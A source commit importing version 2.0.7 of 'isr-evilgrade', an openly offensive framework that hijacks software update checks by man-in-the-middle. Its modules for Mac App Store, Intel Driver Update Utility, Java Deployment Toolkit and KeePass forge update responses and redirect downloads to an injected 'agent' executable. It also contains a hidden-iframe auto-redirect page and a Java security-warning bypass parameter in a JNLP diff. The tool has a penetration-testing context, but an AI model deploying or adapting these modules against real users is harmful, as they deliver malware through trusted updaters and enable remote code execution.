Commit d3ed3654 authored by Sophie Brun's avatar Sophie Brun

Imported Upstream version 2.0.7

parent 158e8a6f
This diff is collapsed.
Version 2.0.7 - 03-06-2016
--------------------------
- (Samsung SW Update Tool 2.2.5.16) samsung module added
- (Intel Driver Update Utility 2.2.0.5) inteldriver module added
- Keepass CVE-2016-5119, keepass module added
- Lenovo's OEM modules, (lenovo,lenovoapk, lenovofirmware) modules added
- timedoctor module added
Version 2.0.6 - 17-01-2014
--------------------------
-Adding support to Faraday www.faradaysec.com - RPC Api connection
Version 2.0.5 - 06-05-2013
--------------------------
- Adding support for Windows by Elian Gidoni
- sunjava module add Java Security Warning Bypass found by Esteban Guillardoy (__applet_ssv_validated parameter)
- update last version dap module
Version 2.0.4 - 07-11-2011
--------------------------
- sunjava module updated. Support Java <=1.6.0.28
Version 2.0.3 - 18-10-2011
---------------------------
-(Java Deployment Toolkit <= v6.0.240.7 found by Neal Poole) - jdtoolkit module added
Version 2.0.2 - 17-10-2011
---------------------------
- CVE-2011-3230 - (Safari 5.1.1) safari module added
- CVE-2011-3224 - (Mac App Store) appstore module added
Found by Aaron Sigel and Brian Mastenbrook
Version 2.0.1 - 07-07-2011
---------------------------
- MacPorts 1.9.2 (port) module added
Version 2.0.0 - 29-10-2010
---------------------------
......
Elian Gidoni < elian+at+gegidoni+dot+com >,
- Windows support
Leandro Costantino <lcostantino+at+gmail+dot+com>
- Console fixup, modules, DNSSERVER integration, SSL integration
......
To run evilgrade under Windows you should download the last version of Strawberry Perl from:
http://strawberryperl.com/releases.html
......@@ -12,7 +12,7 @@
<MUST>1</MUST>
<CLOSE_DAP>0</CLOSE_DAP>
<FREE_TEXT><%DESCRIPTION%></FREE_TEXT>
<WINDOWSVERSION>492</WINDOWSVERSION>
<WINDOWSVERSION>10492</WINDOWSVERSION>
<Run>1</Run>
</COMPONENT>
<URL><%ENDSITE%></URL>
......
<?xml version=""1.0"" encoding=""utf-8""?>
<Drivers xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns="http://tempuri.org/GetDrivers.xsd">
<Driver>
<Driver_ID>24696</Driver_ID>
<Type>Graphics</Type>
<Status>Active</Status>
<Release_Date>2015-02-04</Release_Date>
<Version>15.28.23.64.4101</Version>
<File_Name>win64_152823.zip</File_Name>
<File_Url>http://storefront.download.protexis.net/24696/a08/win64_152823.zip</File_Url>
<HardwareSignature>VEN_8086&amp;DEV_010A</HardwareSignature>
<IsComponent>true</IsComponent>
<Languages>
<Language>
<Language_Code>en</Language_Code>
<Driver_Name>Intel® HD Graphics Driver for Windows* 7/8/8.1 64-bit</Driver_Name>
<Driver_Details>Installs the Intel® HD Graphics Driver for Windows* 7/8/8.1 64-bit version 15.28.23.64.4101 (9.17.10.4101)</Driver_Details>
</Language>
</Languages>
<Installer_Result_Key>SOFTWARE\Intel\GFX</Installer_Result_Key>
<Installer_Version_Key>SOFTWARE\Intel\GFX</Installer_Version_Key>
<Installer_Reboot_Flag>deferred</Installer_Reboot_Flag>
<Installer_Cmd_Line>-s -overwrite</Installer_Cmd_Line>
</Driver>
</Drivers>
\ No newline at end of file
<html>
<head>
<base href="file://">
</head>
<body>
<iframe src="<%SERVER%>"
width="0" height="0" scrolling="auto" frameborder="1" transparency>
</iframe>
<script>
setTimeout("document.location='<%FILE%>';",8000);
</script>
</body>
</html>
This diff is collapsed.
......@@ -200,4 +200,68 @@
<os>win7, winvista, win2008R2, winlong</os>
<url>http://java.sun.com/java_update_seven.xml</url>
</mapping>
<mapping>
<version>1.6.0_23</version>
<url>http://java.sun.com/java_update.xml</url>
</mapping>
<mapping>
<version>1.6.0_23</version>
<os>win7, winvista, win2008R2, winlong</os>
<url>http://java.sun.com/java_update_seven.xml</url>
</mapping>
<mapping>
<version>1.6.0_24</version>
<url>http://java.sun.com/java_update.xml</url>
</mapping>
<mapping>
<version>1.6.0_24</version>
<os>win7, winvista, win2008R2, winlong</os>
<url>http://java.sun.com/java_update_seven.xml</url>
</mapping>
<mapping>
<version>1.6.0_25</version>
<url>http://java.sun.com/java_update.xml</url>
</mapping>
<mapping>
<version>1.6.0_25</version>
<os>win7, winvista, win2008R2, winlong</os>
<url>http://java.sun.com/java_update_seven.xml</url>
</mapping>
<mapping>
<version>1.6.0_26</version>
<url>http://java.sun.com/java_update.xml</url>
</mapping>
<mapping>
<version>1.6.0_26</version>
<os>win7, winvista, win2008R2, winlong</os>
<url>http://java.sun.com/java_update_seven.xml</url>
</mapping>
<mapping>
<version>1.6.0_27</version>
<url>http://java.sun.com/java_update.xml</url>
</mapping>
<mapping>
<version>1.6.0_27</version>
<os>win7, winvista, win2008R2, winlong</os>
<url>http://java.sun.com/java_update_seven.xml</url>
</mapping>
<mapping>
<version>1.6.0_28</version>
<url>http://java.sun.com/java_update.xml</url>
</mapping>
<mapping>
<version>1.6.0_28</version>
<os>win7, winvista, win2008R2, winlong</os>
<url>http://java.sun.com/java_update_seven.xml</url>
</mapping>
<mapping>
<version>1.6.0_29</version>
<url>http://java.sun.com/java_update.xml</url>
</mapping>
<mapping>
<version>1.6.0_29</version>
<os>win7, winvista, win2008R2, winlong</os>
<url>http://java.sun.com/java_update_seven.xml</url>
</mapping>
</java-update-map>
......@@ -20,7 +20,6 @@
<jar href="http://java.sun.com/FunnyClass2.jar"/>
</resources>
<application-desc main-class="">
<param name="__applet_ssv_validated" value="true"></param>
</application-desc>
</jnlp>
<installerInformation>
<versionId>14521627</versionId>
<version>99.99.99</version>
<platformFileList>
<platformFile>
<filename>setup-timedoctor-99.99.99-windows.exe</filename>
<platform>windows</platform>
</platformFile>
</platformFileList>
<downloadLocationList>
<downloadLocation>
<url>https://updates.timedoctor.com/download/_production/windows/</url>
</downloadLocation>
</downloadLocationList>
</installerInformation>
\ No newline at end of file
......@@ -51,6 +51,8 @@ sub new {
# running in a terminal, which we aren't during "make test", at
# least on FreeBSD. Suppress warnings here.
local $SIG{__WARN__} = sub { };
# This env setting fixes FD locks in win32 shell.
$ENV{TERM} = 'not dumb' if $^O eq 'MSWin32';
Term::ReadLine->new('shell');
} || undef,
on_signal => 0,
......@@ -147,9 +149,12 @@ sub cmdloop {
if ($pid == 0){ #STDIN thread (child)
close CHILD;
while(1){ #STDIN loop
my $line = $o->readline();
my $line;
if ($^O eq 'MSWin32'){
$line = $o->readline($o->prompt_str);
}else{
$line = $o->readline();
}
print PARENT $line."\n";
exit 0 if $line eq "exit";
}
......@@ -161,7 +166,7 @@ sub cmdloop {
my $hl2 = new IO::Select(\*CHILDM);
#Print Prompt
print "\c[[4m".$o->prompt_str."\c[[0m";
print "\c[[4m".$o->prompt_str."\c[[0m" unless ($^O eq 'MSWin32');
while(1) { #Msg loop
usleep(10000);
#sleep(1); #fix loop cpu usage
......@@ -169,7 +174,7 @@ sub cmdloop {
foreach my $fh (@ready){
my $line = <$fh>;
$o->cmd($line);
print "\c[[4m".$o->prompt_str."\c[[0m" if (!$o->{stop});
print "\c[[4m".$o->prompt_str."\c[[0m" if (!$o->{stop} && !($^O eq 'MSWin32'));
}
my @ready2 = $hl2->can_read(0);
......
......@@ -30,6 +30,8 @@ use Data::Dump qw(dump);
my $options = {
'port' => { 'val' => 80, 'desc' => 'Webserver listening port'},
'sslport' => { 'val' => 443, 'desc' => 'Webserver SSL listening port'},
'RPCfaraday' => { 'val' => "http://127.0.0.1:9876/", 'desc' => 'Faraday RPC Server'},
'faraday' => { 'val' => 0, 'desc' => 'Enable RPC Faraday connection'},
'debug' => { 'val' => 1, 'desc' => 'Debug mode'},
'DNSPort' => { 'val' => 53, 'desc' => 'Listen Name Server port'},
'DNSEnable' => { 'val' => 1, 'desc' => 'Enable DNS Server ( handle virtual request on modules )'},
......@@ -72,7 +74,7 @@ sub loadmodules{
if (!opendir(DIR,"$path")){
return "[LOADMODULES] - (*) No such file or directory ($path)";
}
my @files = grep(!/^\.\.?$/,readdir(DIR));
my @files = grep(!/(^\.\.?$|^\.svn$)/,readdir(DIR));
closedir(DIR);
my $modules;
......
......@@ -33,7 +33,8 @@ use isrcore::ASCIITable;
use isrcore::dnsserver;
#external modules
use Data::Dump qw(dump);
require RPC::XML;
require RPC::XML::Client;
#ignore child's process to avoid zombie
$SIG{CHLD} = 'IGNORE';
......@@ -52,7 +53,7 @@ sub init {
my $isrmain = isrcore::main->new();
if( $shellz::ppid == 0 )
{
$shellz::ppid= getppid();
$shellz::ppid= $$;
}
#Loadmodules
my $ret = $isrmain->loadmodules();
......@@ -63,7 +64,7 @@ sub init {
$self->{'dnsserver'}=$dnsserver;
$self->{'webserver'}=$webserver;
$self->{'isrmain'}=$isrmain;
$self->{'VERSION'}="2.0.0";
$self->{'VERSION'}="2.0.1";
$self->{'path'}="";
$self->{'prompt'}="evilgrade";
$self->{'change'}=0;
......@@ -398,7 +399,7 @@ sub run_restart {
sub run_exit {
my $self = shift;
if( getppid() == $shellz::ppid ){
if( $$ == $shellz::ppid ){
$self->run_stop();
kill KILL => $self->{pid};
$self->{on_signal}=1;
......@@ -440,6 +441,22 @@ sub console_cmd {
if ($file) {
$self->{'webserver'}->{'users'}->{$ip}->{$module}->{'file'}=($tfile) ? "$tfile\n$md5,$sha256,'$cwd',$file" :"$md5,$sha256,'$cwd',$file";
}
#RPC faraday connection
if ($self->{'isrmain'}->{'Base'}->{'options'}->{'faraday'}->{'val'} == 1){
eval {
my $cli = RPC::XML::Client->new($self->{'isrmain'}->{'Base'}->{'options'}->{'RPCfaraday'}->{'val'});
my $resp = $cli->send_request('devlog','Importing evilgrade information');
my $h_id = $cli->send_request('createAndAddHost',$ip,"unknown");
my $var = RPC::XML::array->new("URL-http://github.com/infobyte/evilgrade/");
my $v_id = $cli->send_request('createAndAddVulnToHost',$h_id->value,"Evilgrade injection -".$module,"This ip is interacted with evilgrade framework see the notes inside the host for more information",$var,"HIGH");
#add note host id, note, value
my $n_id = $cli->send_request('createAndAddNoteToHost',$h_id->value,"Evilgrade -".$module,$action) if ($action);
my $n_id2 = $cli->send_request('createAndAddNoteToHost',$h_id->value,"Evilgrade file -".$module,($tfile) ? "$tfile\n$md5,$sha256,'$cwd',$file" :"$md5,$sha256,'$cwd',$file");
}
}
}
##########################################################################
......@@ -452,7 +469,7 @@ sub smry_configure {"Configure <module-name>"}
sub smry_reload {"Reload to update all the modules"}
sub smry_start {"Start webserver"}
sub smry_status {"Get webserver status"}
sub smry_stop {"Stop webserver"}
sub smry_stop {"Stop webserverR"}
sub smry_restart {"Restart webserver"}
sub smry_vhosts {"Show vhosts enable"}
......
......@@ -27,7 +27,7 @@ use Data::Dump qw(dump);
my $base=
{
'name' => 'Apple OS X Software',
'name' => 'Apple Windows Update Software',
'version' => '1.0',
'appver' => ' < 2.1.2 (<= Safari 5.0.2 7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8 1675)',
'author' => [ 'Francisco Amato < famato +[AT]+ infobytesec.com>' ],
......
###############
# appstore.pm
#
# Copyright 2010 Francisco Amato
#
# This file is part of isr-evilgrade, www.infobytesec.com .
#
# isr-evilgrade is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation version 2 of the License.
#
# isr-evilgrade is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with isr-evilgrade; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
# '''
##
package modules::appstore;
use strict;
use Data::Dump qw(dump);
use isrcore::utils;
my $base=
{
'name' => 'appstore',
'version' => '1.0',
'appver' => '< Mac OS X v10.6.*',
'author' => [ 'Francisco Amato < famato +[AT]+ infobytesec.com >' ],
'description' => qq{CVE: CVE-2011-3224 Found By: Aaron Sigel and Brian Mastenbrook
The agent have a modification in Resources/scripts/updatefrontend.py to open a Chess application
look for the comment evilgrade.
The code is execute the next time the user open the help book, more information:
http://vttynotes.blogspot.com/2011/10/cve-2011-3224-mitm-to-rce-with-mac-app.html},
'vh' => '(help.apple.com)',
'request' => [
{
'req' => 'helpbook-version.txt', #regex friendly
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => 0,
'string' => '324071169.795686',
'parse' => 0,
'file' => '',
},
{
'req' => '.zip', #regex friendly
'type' => 'agent', #file|string|agent|install
'method' => '', #any
'bin' =>1,
'string' => '',
'parse' => 0,
'file' => ''
},
],
#Options
'options' => { 'agent' => { 'val' => './agent/helpbook.zip', 'desc' => 'Agent to inject'},
'enable' => { 'val' => 1,
'desc' => 'Status'},
}
};
##########################################################################
# FUNCTION new
# RECEIVES
# RETURNS
# EXPECTS
# DOES class's constructor
sub new {
my $class = shift;
my $self = { 'Base' => $base, @_ };
return bless $self, $class;
}
1;
###############
# inteldriver.pm
#
# Copyright 2010 Francisco Amato
#
# This file is part of isr-evilgrade, www.infobytesec.com .
#
# isr-evilgrade is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation version 2 of the License.
#
# isr-evilgrade is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with isr-evilgrade; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
# '''
##
package modules::inteldriver;
use strict;
use Data::Dump qw(dump);
my $base=
{
'name' => 'inteldriver',
'version' => '1.0',
'appver' => ' <= Intel Driver Update Utility 2.2.0.5',
'author' => [ 'Francisco Amato <famato +[AT]+ infobytesec.com' ],
'description' => qq{CVE: CVE-2016-1493 Found By: Joaquín Rodríguez Varela
The Intel Driver Update Utility [1] is a tool that analyzes the system drivers on your computer.
The utility reports if any new drivers are available, and provides the download files for the driver updates so you can install them quickly and easily.
Intel [2] Driver Update Utility is prone to a Man in The Middle attack which could result in integrity corruption of the transferred data, information leak
and consequently code execution.
https://www.coresecurity.com/advisories/intel-driver-update-utility-mitm},
'vh' => '(storefront.download.protexis.net)',
'request' => [
{
'req' => 'IDDAPI/Prod/productfamily/desktopboard/driver/getbyhardwaresignature/ven_8086&dev_010a/a08/190.xml',
'type' => 'file',
'method' => '',
'bin' => '0',
'string' => '',
'parse' => '1',
'file' => './include/inteldriver/general.xml',
},
{
'req' => '.zip',
'type' => 'agent',
'method' => '',
'bin' => 1,
'string' => '',
'parse' => '0',
'file' => ''
},
],
#Options
'options' => {
'agent' => {
'val' => './agent/agent.zip',
'desc' => 'Agent to inject',
},
'enable' => {
'val' => 1,
'desc' => 'Status'
},
}
};
##########################################################################
# FUNCTION new
# RECEIVES
# RETURNS
# EXPECTS
# DOES class's constructor
sub new {
my $class = shift;
my $self = { 'Base' => $base, @_ };
return bless $self, $class;
}
1;
###############
# jdtoolkit.pm
#
# Copyright 2011 Francisco Amato
#
# This file is part of isr-evilgrade, www.infobytesec.com .
#
# isr-evilgrade is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation version 2 of the License.
#
# isr-evilgrade is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with isr-evilgrade; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
# '''
##
package modules::jdtoolkit;
use strict;
use Data::Dump qw(dump);
use isrcore::utils;
my $base=
{
'name' => ' Java Deployment Toolkit',
'version' => '1.0',
'appver' => '< v6.0.240.7',
'author' => [ 'Francisco Amato < famato +[AT]+ infobytesec.com >' ],
'description' => qq{Found By: Neal Poole.
The Java Deployment Toolkit Plugin v6.0.240.7 and below for Firefox and Google Chrome can be used to download
and run an improperly signed executable on a target’s system. UAC, if enabled, will prompt the user before
running the executable. This vulnerability has been tested and confirmed to exist on Windows 7, both 32-bit
and 64-bit. It was fixed in Java 7 and Java 6 Update 29.
https://nealpoole.com/blog/2011/10/java-deployment-toolkit-plugin-does-not-validate-installer-executable/},
'vh' => '(java.sun.com)',
'request' => [
{
'req' => '/update.html', #regex friendly
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => 0,
'string' => '
<html>
<head>
<title>Java Deployment Toolkit update</title>
</head>
<body>
<script src="http://www.java.com/js/deployJava.js"></script>
<script type="text/javascript">
deployJava.getPlugin().installLatestJRE();
</script>
</body>
</html>
',
'parse' => 0,
'file' => '',
},
{
'req' => '/webapps/download/AutoDL', #regex friendly
'type' => 'agent', #file|string|agent|install
'method' => '', #any
'bin' =>1,
'string' => '',
'parse' => 0,
'file' => ''
},
],
#Options
'options' => { 'agent' => { 'val' => './agent/agent.exe', 'desc' => 'Agent to inject'},
'enable' => { 'val' => 1,
'desc' => 'Status'},
}
};
##########################################################################
# FUNCTION new
# RECEIVES
# RETURNS
# EXPECTS
# DOES class's constructor
sub new {
my $class = shift;
my $self = { 'Base' => $base, @_ };
return bless $self, $class;
}
1;
###############
# keepass.pm
#
# Copyright 2016 Matias Ariel Re Medina
#
# This file is part of isr-evilgrade, www.infobytesec.com .
#
# isr-evilgrade is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation version 2 of the License.
#
# isr-evilgrade is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with isr-evilgrade; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
# '''
##
package modules::keepass;
use strict;
use Data::Dump qw(dump);
my $base = {
'name' => 'keepass',
'version' => '1.0',
'appver' => 'All',
'author' => ['Matias Ariel Re Medina <mre[at]infobytesec[dot]com>'],
'description' => qq{Keepass updater.},
'vh' => 'keepass.info',
'request' => [
{ 'req' => 'update/version2x.txt.gz', #regex friendly
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => '0',
'string' => '',
'parse' => '1',
'file' => '',
'cheader' => "HTTP/1.1 200 OK\r\n"
. "Accept-Ranges: bytes\r\n"
. "Content-Length: 482 \r\n"
. "Connection: close \r\n"
. "Content-Type: text/plain\r\n\r\n"
.":
KeePass:<%VERSION%>
ArcFour Cipher Plugin:2.0.9
CodeWallet3ImportPlugin:1
DataBaseBackup:2.0.8.6
DataBaseReorder:2.0.8
EnableGridLines:1.1
eWallet Liberated Data Importer:0.12
IOProtocolExt:1.12
ITanMaster:2.28.0.2
KdbxLite:1.1
KeeAutoExec:1.8
KeeOldFormatExport:1
KeeResize:1.7
KPScript - Scripting KeePass:2.34
OnScreenKeyboard2:1.2
OtpKeyProv:2.4
PwGen8U:1
PwGenBaliktad:1.2
QR Code Generator:2.0.12
QualityColumn:1.2
Sample Plugin for Developers:2.0.9
SpmImport:1.2
WinKee:2.28.0.1
:",
},
{ 'req' => 'sflogo\.php\?group_id=\d+&type=\d+', #regex friendly
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => 0,
'string' => '',
'parse' => '1',
'file' => '',
'cheader' => "HTTP/1.1 302 Found\r\n"
. "Location: http://keepass.info/<%EXENAME%>.exe \r\n"
. "Content-Length: 0 \r\n"
. "Connection: close \r\n\r\n",
},
{ 'req' => '.exe', #regex friendly
'type' => 'agent', #file|string|agent|install
'method' => '', #any
'bin' => 1,
'string' => '',
'parse' => '0',
'file' => ''
},
],
#Options
'options' => {
'agent' => {
'val' => './agent/agent.exe',
'desc' => 'Agent to inject'
},
'enable' => {
'val' => 1,
'desc' => 'Status'
},
'version' => {
'val' => '3.12',
'desc' => 'Version, has to be older than target. No more than 3 digits.'
},
'exename' => {
'val' => 'KeePass-3.12',
'desc' => 'Zip name'
},
}
};